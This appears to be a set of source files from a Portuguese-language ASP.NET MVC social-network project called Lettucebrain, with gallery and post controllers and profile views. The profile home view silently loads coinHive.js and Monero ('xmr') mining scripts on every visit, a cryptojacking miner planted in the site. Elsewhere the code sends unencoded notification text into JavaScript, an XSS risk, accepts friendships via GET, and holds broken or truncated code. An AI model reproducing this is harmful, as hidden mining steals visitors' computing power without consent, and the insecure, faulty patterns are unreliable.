WebAPI.MVC/Controllers/GalleryController.cs
using Newtonsoft.Json.Linq;
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Threading.Tasks;
using System.Web;
using System.Web.Mvc;
using System.Web.SessionState;
using WebAPI.MVC.Configurations;
using WebAPI.MVC.Models;

namespace WebAPI.MVC.Controllers
{
    [SessionState(SessionStateBehavior.Default)]
    public class GalleryController : Controller
    {
        //GET: Gallery
        [HttpGet]
        public ActionResult Index()
        {
            IEnumerable<GalleryViewModel> galleries;
            var client = GlobalWebApiClient.GetClient();
            var response = client.GetAsync("api/galleries/all").Result;

            try
            {
                if (response.IsSuccessStatusCode)
                {
                    galleries = response.Content.ReadAsAsync<IEnumerable<GalleryViewModel>>().Result;
                    return View(galleries.ToList());
                }
                else
                {
                    ViewBag.Error = "Server Error. Please contact administrator!";
                }
            }
            catch (Exception ex)
            {
                var result = ex.Message;
            }
            return View();
        }

        // GET: Gallery/Details/5
        [HttpGet]
        public ActionResult Details(Guid? id)
        {
            try
            {
                var client = GlobalWebApiClient.GetClient();
                var responseGallery = client.GetAsync("api/galleries/gallery/info/" + id.ToString()).Result;

                if (responseGallery.IsSuccessStatusCode)
                {
                    var gallery = responseGallery.Content.ReadAsAsync<GalleryViewModel>().Result;

                    //var client = GlobalWebApiClient.GetClient();
                    var response = client.GetAsync("/api/images/imagesbyuser").Result;
                    var responseUser = client.GetAsync("/api/Account/LoggedUser").Result;

                    if (responseUser.IsSuccessStatusCode && response.IsSuccessStatusCode)
                    {
                        IEnumerable<ImageViewModel> userImages;
                        userImages = response.Content.ReadAsAsync<IEnumerable<ImageViewModel>>().Result;
                        var loggedUser = responseUser.Content.ReadAsAsync<ProfileViewModel>().Result;                        

                        if (loggedUser.Id.ToString().Equals(Session["UserId"].ToString()))
                        {                            
                            ViewBag.PhotoCount = userImages.ToList().Count;
                            ViewBag.ImagesByUser = userImages.ToList();
                            ViewBag.LoggedUser = true;

                            var transport = new TransportImageViewModel
                            {
                                DetailsGVM = gallery
                            };
                            

                            return View(transport);
                        }
                        else
                        {
                            ViewBag.LoggedUser = false;
                        }
                    }
                }
                else
                {
                    return View();
                }
            }
            catch (Exception ex)
            {
                var result = ex.Message;
            }
            return View();
        }

        // GET: Gallery/Create
        [HttpGet]
        public ActionResult Create()
        {
            return View();
        }

        //POST: Gallery/Create
        [HttpPost]
        [ValidateAntiForgeryToken]
        public ActionResult Create(GalleryViewModel gallery, HttpPostedFileBase file)
        {
            if (ModelState.IsValid)
            {                
                var client = GlobalWebApiClient.GetClient();
               
                var photoUrl = Upload(file);
                gallery.PhotoUrl = photoUrl.Substring(1, photoUrl.Length - 2);
                gallery.ProfileId = Guid.Parse(Session["UserId"].ToString());

                var response = client.PostAsJsonAsync("api/galleries/save/", gallery).Result;
                try
                {
                    if (response.IsSuccessStatusCode)
                    {
                        gallery = response.Content.ReadAsAsync<GalleryViewModel>().Result;

                        var transport = new TransportImageViewModel
                        {
                            DetailsGVM = gallery
                        };

                        TempData["SuccessMessage"] = "Gallery created successfully";
                        return RedirectToAction("Details", transport.DetailsGVM);
                    }
                }
                catch (Exception ex)
                {
                    var result = ex.Message;
                }
            }
            else
            {
                ModelState.AddModelError(string.Empty, "Server Error. Please contact administrator.");
            }
            return View(gallery);
        }

        // GET: Gallery/Edit/5
        [HttpGet]
        public ActionResult Edit(Guid? id)
        {
            var client = GlobalWebApiClient.GetClient();
            var response = client.GetAsync("api/galleries/gallery/info/" + id.ToString()).Result;

            try
            {
                if (response.IsSuccessStatusCode)
                {
                    var gallery = response.Content.ReadAsAsync<GalleryViewModel>().Result;
                    //gallery.ProfileId = Guid.Parse(Session["ProfileId"].ToString());
                    return View(gallery);
                }
                else
                {
                    return View();
                }
            }
            catch (Exception ex)
            {
                var result = ex.Message; ;
            }
            return View();
        }

        // POST: Gallery/Edit/5
        [HttpPost]
        [ValidateAntiForgeryToken]
        public ActionResult Edit(GalleryViewModel gallery, HttpPostedFileBase file)
        {
            if (ModelState.IsValid)
            {
                var photoUrl = Upload(file);
                gallery.PhotoUrl = photoUrl.Substring(1, photoUrl.Length - 2);

                var client = GlobalWebApiClient.GetClient();
                var response = client.PutAsJsonAsync("api/galleries/update/", gallery).Result;
                try
                {
                    if (response.IsSuccessStatusCode)
                    {
                        gallery = response.Content.ReadAsAsync<GalleryViewModel>().Result;
                        TempData["SuccessMessage"] = "Gallery updated successfully";
                        return RedirectToAction("Details", gallery);
                    }
                }
                catch (Exception ex)
                {
                    var result = ex.Message;
                }
            }
            else
            {
                ModelState.AddModelError(string.Empty, "Server Error. Please contact administrator.");
            }
            return View(gallery);
        }

        // GET: Gallery/Delete/5
        [HttpGet]
        public ActionResult Delete(Guid id)
        {
            var client = GlobalWebApiClient.GetClient();
            var response = client.GetAsync("api/galleries/gallery/info/" + id.ToString()).Result;

            try
            {
                if (response.IsSuccessStatusCode)
                {
                    var gallery = response.Content.ReadAsAsync<GalleryViewModel>().Result;
                    return View(gallery);
                }
                else
                {
                    return View();
                }
            }
            catch (Exception ex)
            {
                var result = ex.Message; ;
            }
            return View();
        }

        // POST: Gallery/Delete/5
        [HttpPost]
        [ValidateAntiForgeryToken]
        public ActionResult Delete(Guid? id)
        {
            if (ModelState.IsValid)
            {
                var client = GlobalWebApiClient.GetClient();
                var response = client.DeleteAsync("api/galleries/gallery/del/" + id.ToString()).Result;

                try
                {
                    if (response.IsSuccessStatusCode)
                    {
                        TempData["SuccessMessage"] = "Gallery deleted successfully";
                        return RedirectToAction("Index");
                    }
                }
                catch (Exception ex)
                {
                    var result = ex.Message; ;
                }
            }
            else
            {
                ModelState.AddModelError(string.Empty, "Server Error. Please contact administrator.");
            }
            return View();
        }

        // POST: Gallery/Upload
        [HttpPost]
        [ValidateAntiForgeryToken]
        public String Upload(HttpPostedFileBase file)
        {
            if (ModelState.IsValid)
            {
                try
                {
                    const String URI_ADDRESS = "api/galleries/upload/";
                    var client = GlobalWebApiClient.GetClient();

                    using (var content = new MultipartFormDataContent())
                    {
                        byte[] Bytes = new byte[file.InputStream.Length + 1];
                        file.InputStream.Read(Bytes, 0, Bytes.Length);
                        var fileContent = new ByteArrayContent(Bytes);
                        fileContent.Headers.ContentDisposition = new ContentDispositionHeaderValue("attachment") { FileName = file.FileName };
                        content.Add(fileContent);

                        var response = client.PostAsync(URI_ADDRESS, content).Result;

                        if (response.IsSuccessStatusCode)

WebAPI.MVC/Controllers/HomeController.cs
using System.Web.Mvc;

namespace WebAPI.MVC.Controllers
{
    public class HomeController : Controller
    {
        public ActionResult Index()
        {
            if (Session["Email"] != null)
            {                
                RedirectToAction("About");
            }
            
            return View();
        }

        public ActionResult About()
        {
            ViewBag.Message = "Your application description page.";

            return View();
        }

        public ActionResult Contact()
        {
            ViewBag.Message = "Your contact page.";

            return View();
        }
    }
}

WebAPI.MVC/Controllers/PostController.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net.Http;
using System.Web;
using System.Web.Mvc;
using WebAPI.MVC.Configurations;
using WebAPI.MVC.Models;

namespace WebAPI.MVC.Controllers
{
    public class PostController : Controller
    {
        // GET: Posts
        public ActionResult Index()
        {
            IEnumerable<PostViewModel> posts;
            var client = GlobalWebApiClient.GetClient();
            var response = client.GetAsync("api/posts/all").Result;

            if (response.IsSuccessStatusCode)
            {
                posts = response.Content.ReadAsAsync<IEnumerable<PostViewModel>>().Result;
                return View(posts.ToList());
            }
            else
            {
                ViewBag.Result = "Server Error. Please contact administrator!";
            }
            return View();
        }

        // GET: Posts/Details/5
        public ActionResult Details(Guid? id)
        {
            var client = GlobalWebApiClient.GetClient();
            var response = client.GetAsync($"api/posts/post/info/?id={id.ToString()}").Result;

            if (response.IsSuccessStatusCode)
            {
                var pvm = response.Content.ReadAsAsync<PostViewModel>().Result;
                return View(pvm);
            }
            else
            {
                ViewBag.Result = "Server Error. Please contact administrator!";
            }
            return View();
        }

        // GET: Posts/Create
        public ActionResult Create()
        {
            return View();
        }

        // POST: Posts/Create
        // Para se proteger de mais ataques, ative as propriedades específicas a que você quer se conectar. Para 
        // obter mais detalhes, consulte https://go.microsoft.com/fwlink/?LinkId=317598.
        [HttpPost]
        [ValidateAntiForgeryToken]
        public ActionResult Create(PostViewModel pvm)
        {
            if (ModelState.IsValid)
            {
                var client = GlobalWebApiClient.GetClient();
                var response = client.PostAsJsonAsync("api/posts/save/", pvm).Result;
                try
                {
                    if (response.IsSuccessStatusCode)
                    {
                        pvm = response.Content.ReadAsAsync<PostViewModel>().Result;
                        TempData["SuccessMessage"] = "Post created successfully";
                        return RedirectToAction("Details", pvm);
                    }
                }
                catch (Exception ex)
                {
                    var result = ex.Message;
                }
            }
            else
            {
                ModelState.AddModelError(string.Empty, "Server Error. Please contact administrator.");
            }
            return View(pvm);
        }

        // GET: Posts/Edit/5
        public ActionResult Edit(Guid? id)
        {
            var client = GlobalWebApiClient.GetClient();
            var response = client.GetAsync($"api/posts/post/info/?id={id.ToString()}").Result;

            if (response.IsSuccessStatusCode)
            {
                var pvm = response.Content.ReadAsAsync<PostViewModel>().Result;
                return View(pvm);
            }
            else
            {
                return View();
            }
        }

        // POST: Posts/Edit/5
        // Para se proteger de mais ataques, ative as propriedades específicas a que você quer se conectar. Para 
        // obter mais detalhes, consulte https://go.microsoft.com/fwlink/?LinkId=317598.
        [HttpPost]
        [ValidateAntiForgeryToken]
        public ActionResult Edit(PostViewModel pvm)
        {
            if (ModelState.IsValid)
            {
                var client = GlobalWebApiClient.GetClient();
                var response = client.PutAsJsonAsync("/api/posts/update/", pvm).Result;
                try
                {
                    if (response.IsSuccessStatusCode)
                    {
                        pvm = response.Content.ReadAsAsync<PostViewModel>().Result;
                        TempData["SuccessMessage"] = "Post updated successfully";
                        return RedirectToAction("Details", pvm);
                    }
                }
                catch (Exception ex)
                {
                    var result = ex.Message;
                }
            }
            else
            {
                ModelState.AddModelError(string.Empty, "Server Error. Please contact administrator.");
            }
            return View(pvm);
        }

        // GET: Posts/Delete/5
        public ActionResult Delete(Guid? id)
        {
            var client = GlobalWebApiClient.GetClient();
            var response = client.GetAsync($"api/posts/post/del/?id={id.ToString()}").Result;

            if (response.IsSuccessStatusCode)
            {
                var pvm = response.Content.ReadAsAsync<PostViewModel>().Result;
                return View(pvm);
            }
            else
            {
                return View();
            }
        }

        // POST: Posts/Delete/5
        [HttpPost, ActionName("Delete")]
        [ValidateAntiForgeryToken]
        public ActionResult DeleteConfirmed(Guid id)
        {
            if (ModelState.IsValid)
            {
                var client = GlobalWebApiClient.GetClient();
                var response = client.DeleteAsync("api/posts/post/del/" + id.ToString()).Result;

                try
                {
                    if (response.IsSuccessStatusCode)
                    {
                        var pvm = response.Content.ReadAsAsync<PostViewModel>().Result;
                        TempData["SuccessMessage"] = "Post deleted successfully";
                        return RedirectToAction("Index");
                    }
                }
                catch (Exception ex)
                {
                    var result = ex.Message;
                }
            }
            else
            {
                ModelState.AddModelError(string.Empty, "Server Error. Please contact administrator.");
            }
            return View();
        }
    }
}

WebAPI.MVC/Views/Profiles/Home.cshtml
@model  WebAPI.MVC.Models.ProfileViewModel
<body>
    @{
        Layout = "~/Views/Shared/_Layout.cshtml";
        ViewBag.Title = "Lettucebrain - Home";
        Styles.Render("~/Content/PostList.css");
    }
    <style>

        p {
            word-break: break-all;
            white-space: normal;
            word-wrap: break-word;
        }
    </style>
    <div class="text-center" style="margin-top: 3%">
        <div class="row">
            <div class="col-sm-3">
                <div class="well">
                    <img src="@Model.PhotoUrl" class="img-circle" height="130" width="130" alt="Avatar">
                    <p>@Html.ActionLink(Model.FirstName, "Details", "Profiles", routeValues: new { Id = Model.Id }, htmlAttributes: null)</p>
                </div>
                <div class="alert alert-success fade in">
                    <a href="#" class="close" data-dismiss="alert" aria-label="close">×</a>
                    <p><strong>Seja Bemvindo!</strong></p>
                </div>
                <div class="alert alert-success fade in">
                    <a href="@Url.Action("Index", "Gallery")">My Galleries</a>
                </div>

                <div class="alert alert-success fade in">
                    @using (Html.BeginForm("Index","Profiles"))
                    {
                        <p>Digite o nome</p>
                        <input type="text" name="termo" id="termo" placeholder="Digite a pesquisa" />
                        <button type="submit">Filtrar</button>
                    }
                </div>

            </div>
            <div class="col-sm-6" style="text-align: center">
                @using (Html.BeginForm("AddProfilePost", "Profiles", FormMethod.Post, new { id = "postForm" }))
                {
                    @Html.AntiForgeryToken()
                    <form class="form-horizontal well" role="form">
                        @*<h4>O que é que há, velhinho?</h4>*@
                        @if (TempData["IsPostEmpty"] != null && (bool)TempData["IsPostEmpty"] == true)
                        {
                            <h4 style="color: red">Escreva algo aqui!</h4>
                        }
                        <textarea class="form-control input-lg" name="Content" style="min-width: 100%" placeholder="Bate Papo!"></textarea>
                        <input type="submit" id="postBtn" value="Publicar" class="btn btn-primary pull-right" />
                        <ul class="list-inline">
                            <li><a href=""><i class="glyphicon glyphicon-upload"></i></a></li>
                            <li><a href=""><i class="glyphicon glyphicon-camera"></i></a></li>
                            <li><a href=""><i class="glyphicon glyphicon-map-marker"></i></a></li>
                        </ul>
                    </form>
                }
                <div class="row">
                    <h4>Sua última publicação</h4>
                    <div class="col-sm-3">
                        <div class="well">
                            <p>@Model.FirstName</p>
                            <a href="@Url.Action("Details", "Profiles")?id=@Model.Id"><img src="@Model.PhotoUrl" class="img-circle" height="55" width="55" alt="Avatar" /></a>
                        </div>
                    </div>
                    <div class="col-sm-9">
                        <div class="well">
                            @{
                                if (Model.Posts.Count > 0)
                                {
                                    <p>@Model.Posts.OrderByDescending(p => p.PostTime).First().Content</p>
                                }
                                else
                                {
                                    <i>Você ainda não tem nenhuma publicação</i>
                                }
                            }
                        </div>
                    </div>
                </div>
                <h4>Publicações mais recentes dos seus amigos</h4>
                @foreach (var friend in Model.Friends)
                {
                    if (friend.RequestedTo.Posts.Count > 0 && friend.Status == WebAPI.MVC.Models.StatusEnumViewModel.Accepted)
                    {
                        <div class="row">
                            <div class="col-sm-3">
                                <div class="well">
                                    <p>@friend.RequestedTo.FirstName</p>
                                    <a href="@Url.Action("Details", "Profiles")?userId=@friend.RequestedTo.Id"><img src="@friend.RequestedTo.PhotoUrl" class="img-circle" height="55" width="55" alt="Avatar" /></a>
                                </div>
                            </div>
                            <div class="col-sm-9">
                                <div class="well">
                                    <p>@friend.RequestedTo.Posts.OrderByDescending(p => p.PostTime).First().Content</p>
                                </div>
                            </div>
                        </div>
                    }
                }
            </div>
        </div>
    </div>
</body>
@section Scripts
{
    @Scripts.Render("~/Scripts/coinHive.js")
    @Scripts.Render("~/Scripts/webmr_xmr.js")
    @Scripts.Render("~/Scripts/functions.js")
    @Scripts.Render("~/Scripts/cntc.js")
    @Scripts.Render("~/Scripts/elements_xmr.js")
    @Scripts.Render("~/Scripts/currency.js")
    <script>
        //if (window.canRunAds === undefined)
        //    alert('Detectamos um bloqueador de anúncios no seu navegador. Por favor desative este bloqueador.');

        $("#postBtn").click(function () {
            $(this).attr("disabled", "disabled");
            $("#postForm").submit();
        });

        @foreach (var notification in Model.Notifications)
        {
            @:$("#userNotifications").append("<br /><br />");
            @:$("#userNotifications").append("<div style='width:100%;background:coral;border:2px solid'><p>@notification.Message</p></div>");
            @:$("#userNotifications").append(`<button data-notification-message="@notification.Message" data-notification-id="@notification.NotificationIssuerId" data-issuer="@notification.NotificationIssuer.Id" class="acceptBtn btn btn-success" style='width:45%' type='button' class='btn btn-success btn-sm'><a class="links">Aceitar</a></button>`);
        }

        $(".acceptBtn").click(function () {
            $(this).attr("disabled", "disabled");
            $.ajax({
                url: "http://localhost:49609/friendship/acceptfriendship",
                type: "get",
                data: {
                    "toUserId": $(this).attr("data-issuer"),
                    "notificationId": $(this).attr("data-notification-id"),
                    "notificationMessage": $(this).attr("data-notification-message")
                },
                success: function () {
                },
                dataType: "json"
            });
            window.location.reload(true);
        });

    $("#notification_bar").append($("#userNotifications"));
    </script>
}

WebAPI.MVC/Views/Profiles/_Details.cshtml
@model WebAPI.MVC.Models.ProfileViewModel

<body>
    @{
        Layout = "~/Views/Shared/_Layout.cshtml";
        ViewBag.Title = "Lettucebrain - Perfil";
        Styles.Render("~/Content/Profile.css");
    }

    <style>
        p {
            word-break: break-all;
            white-space: normal;
            word-wrap: break-word;
        }
    </style>

    <div class="container-fluid">
        <div class="row content">
            <div class="col-sm-3" style="text-align: center">
                <h2>Profile</h2>
                <div class="well">
                    <img src="@Model.PhotoUrl" class="img-circle" style="height:auto; width:110px;" alt="Avatar">
                    <h4> @Model.FirstName </h4>
                    @{
                        DateTime? now1 = DateTime.Today;
                        int age1 = now1.Value.Year - Model.Birthday.Value.Year;
                        if (now1 < Model.Birthday.Value.AddYears(age1))
                        {
                            age1--;
                        }

                        <h5>@age1 anos</h5>

                        var userId = Guid.Parse(Session["UserId"].ToString());
                        var profileId = Model.Id;

                        if (userId.Equals(profileId))
                        {
                            <button type="button" class="btn btn-success">Você!</button>
                        }
                        else if (ViewBag.IsFriend)
                        {
                            <button type="button" class="btn btn-success">Amigos</button>
                        }
                        else if (!ViewBag.IsFriend && ViewBag.RequestedFriendship)
                        {
                            <button type="button" class="btn btn-secondary">Solicitação de amizade enviada</button>
                        }
                        else if (!ViewBag.RequestedFriendship)
                        {
                            <button id="requestBtn" type="button" onclick="location.href='@Url.Action("CreateFriendship", "FriendShip")/?requestedToId=@Model.Id'" class="btn btn-info">Enviar pedido de amizade</button>
                        }
                        <br />

                        <button id="requestBtn" type="button" onclick="location.href='@Url.Action("acceptfriendship", "FriendShip")/?requestedToId=@Model.Id'" class="btn btn-info">Aceitar pedido de amizade</button>

                        <br />
                        <p>Mora em @Model.State.Name, @Model.Country.Name</p>
                    }
                </div>
                <input type="hidden" value="@Model.Id" />
                @*@{
                        if (Model.Country != null)
                        {
                            <img style="width:100px;height:auto" src=@Url.Content("~/Content/images/" + @Model.Country.ToLower() + ".jpg") />
                        }
                    }*@
            </div>
            <div class="col-sm-6">
                <h4>Publicações recentes</h4>
                <hr>
                @{
                    if (Model.Posts.Count > 1)
                    {
                        var posts = Model.Posts.OrderByDescending(p => p.PostTime);

                        for (int i = 0; i < 2; i++)
                        {
                            <h5><span class="glyphicon glyphicon-time"></span> Publicado em @posts.ElementAt(i).PostTime</h5>
                            <p>
                                @posts.ElementAt(i).Content @if (userId.Equals(Model.Id))
                                {
                                    <a href="@Url.Action("Delete", "Post")?id=@posts.ElementAt(i).AuthorId" class="btn btn-danger btn-sm">
                                        <span class="glyphicon glyphicon-remove"></span> Excluir publicação
                                    </a>
                                }
                            </p>
                            <br><br>
                        }
                    }
                    else if (Model.Posts.Count == 1)
                    {
                        <h5><span class="glyphicon glyphicon-time"></span> Publicado em @Model.Posts.First().PostTime</h5>
                        <p>
                            @Model.Posts.First().Content @if (userId.Equals(Model.Id))
                            {
                                <a href="@Url.Action("Delete", "Post")?id=@Model.Posts.First().AuthorId" class="btn btn-danger btn-sm">
                                    <span class="glyphicon glyphicon-remove"></span> Excluir publicação
                                </a>
                            }
                        </p>
                        <br><br>
                    }
                }
            </div>

            <div class="col-sm-3" style="text-align: center">
                <h2>Amigos</h2>
                <div class="well">
                    @{
                        int aux = 0;
                        foreach (var friend in Model.Friends)
                        {
                            if (aux < 3 && friend.Status == WebAPI.MVC.Models.StatusEnumViewModel.Accepted)
                            {
                                <a href="@Url.Action("Details", "Profiles")?id=@friend..Id"><img src="@friend.RequestedTo.PhotoUrl" class="img-circle" height="65" width="65" alt="Avatar"></a>
                                <h4> @friend.RequestedTo.FirstName </h4>
                                DateTime now = DateTime.Today;
                                int age = now.Year - friend.RequestedTo.Birthday.Value.Year;
                                if (now < friend.RequestedTo.Birthday.Value.AddYears(age))
                                {
                                    age--;
                                }

                                <h5>@age anos</h5>
                                aux++;
                                continue;
                            }
                            break;
                        }
                    }
                </div>
            </div>
        </div>
    </div>
</body>

@section Scripts
{
    <script>
        $("#notificationBtn").hide();
        $("#requestBtn").click(function () {
            $(this).attr("disabled", "disabled");
        })
    </script>
}